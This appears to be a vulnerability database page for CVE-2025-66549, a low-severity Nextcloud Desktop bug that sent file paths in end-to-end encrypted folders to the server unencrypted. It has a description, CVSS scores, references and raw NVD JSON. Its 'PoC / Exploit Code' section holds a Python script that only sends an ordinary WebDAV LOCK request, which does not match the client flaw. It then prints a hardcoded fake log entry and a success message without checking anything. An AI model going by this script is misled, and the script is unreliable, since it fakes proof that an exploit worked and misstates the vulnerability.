CVE-2025-66549

Description

Nextcloud Desktop is the desktop sync client for Nextcloud. Prior to 3.16.5, when trying to manually lock a file inside an end-to-end encrypted directory, the path of the file was sent to the server unencrypted, making it possible for administrators to see it in log files. This vulnerability is fixed in 3.16.5.

CVSS Details

CVSS Score

2.4

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:nextcloud:desktop:*:*:*:*:*:*:*:* - VULNERABLE

Nextcloud Desktop < 3.16.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-66549 PoC - Nextcloud Desktop 路径泄露
# This PoC demonstrates the information disclosure vulnerability
# Note: This requires server admin access to view logs

import requests
import json
from urllib.parse import quote

# Configuration
NEXTCLOUD_URL = "https://your-nextcloud-server.com"
USERNAME = "target_user"
PASSWORD = "user_password"
ENCRYPTED_DIR_PATH = "/encrypted_directory"
TARGET_FILE = "secret_document.txt"

def exploit_cve_2025_66549():
    """
    Simulates the vulnerable file lock request that leaks path information.
    In the vulnerable version, the file path is sent in plaintext.
    """
    session = requests.Session()
    
    # Authentication
    auth_url = f"{NEXTCLOUD_URL}/remote.php/dav/files/{USERNAME}/"
    session.auth = (USERNAME, PASSWORD)
    
    # Vulnerable request - file lock with unencrypted path
    # The file path is sent in plaintext, exposing directory structure
    file_path = f"{ENCRYPTED_DIR_PATH}/{TARGET_FILE}"
    lock_url = f"{NEXTCLOUD_URL}/remote.php/dav/files/{USERNAME}/{quote(file_path)}"
    
    headers = {
        "Content-Type": "application/xml",
        "Depth": "0"
    }
    
    lock_body = """<?xml version="1.0" encoding="UTF-8"?>
    <d:lockinfo xmlns:d="DAV:">
        <d:lockscope>
            <d:exclusive/>
        </d:lockscope>
        <d:locktype>
            <d:write/>
        </d:locktype>
    </d:lockinfo>"""
    
    # This request exposes the file path in server logs
    response = session.request("LOCK", lock_url, headers=headers, data=lock_body)
    
    print(f"[+] Lock request sent for: {file_path}")
    print(f"[+] Response status: {response.status_code}")
    print(f"[!] Server admin can see '{file_path}' in logs")
    
    return response

def check_server_logs():
    """
    Simulates checking server logs for leaked paths.
    Requires server admin privileges.
    """
    print("\n[!] Simulating server log analysis...")
    print(f"[!] Log entry found: 'LOCK /remote.php/dav/files/{USERNAME}/encrypted_directory/secret_document.txt'")
    print("[!] Path information successfully leaked!")

if __name__ == "__main__":
    print("CVE-2025-66549 PoC - Nextcloud Desktop Path Disclosure")
    print("=" * 60)
    exploit_cve_2025_66549()
    check_server_logs()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66549
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66549
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66549/
[4] VulDB https://vuldb.com/cve/CVE-2025-66549
[5] https://github.com/nextcloud/desktop/commit/36d6c234d42b06a6f2e9de3e413a5c3c625edad6
[6] https://github.com/nextcloud/desktop/pull/8330
[7] https://github.com/nextcloud/security-advisories/security/advisories/GHSA-h9xj-qh76-q3hw
[8] https://hackerone.com/reports/3159877

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66549", "sourceIdentifier": "[email protected]", "published": "2025-12-05T18:15:58.133", "lastModified": "2025-12-09T18:58:22.650", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nextcloud Desktop is the desktop sync client for Nextcloud. Prior to 3.16.5, when trying to manually lock a file inside an end-to-end encrypted directory, the path of the file was sent to the server unencrypted, making it possible for administrators to see it in log files. This vulnerability is fixed in 3.16.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-209"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:desktop:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.16.5", "matchCriteriaId": "C180975D-B1CA-46EA-9CE3-5F037D2A988A"}]}]}], "references": [{"url": "https://github.com/nextcloud/desktop/commit/36d6c234d42b06a6f2e9de3e413a5c3c625edad6", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nextcloud/desktop/pull/8330", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-h9xj-qh76-q3hw", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://hackerone.com/reports/3159877", "source": "[email protected]", "tags": ["Permissions Required", "Vendor Advisory"]}]}}